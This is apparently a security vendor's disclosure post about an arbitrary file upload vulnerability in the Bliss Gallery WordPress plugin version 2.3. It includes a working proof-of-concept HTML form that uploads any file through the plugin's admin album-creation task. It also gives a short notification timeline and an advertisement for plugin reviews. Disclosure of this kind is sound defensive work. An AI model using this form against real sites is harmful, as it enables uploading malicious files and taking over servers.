07 Jun

Arbitrary File Upload Vulnerability in Bliss Gallery

The Bliss Gallery plugin has an arbitrary file upload vulnerability (as well as a persistent cross-site scripting (XSS) vulnerability and possibly other security issues) as of version 2.3. The details of the underlying issue that causes this can be found inour post for a vulnerability in the plugin Vertical Slideshow, which shares the same vulnerable code.

Proof of Concept

The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/unique/1_uploadfolder/big/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=unique_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="uni_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/7/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *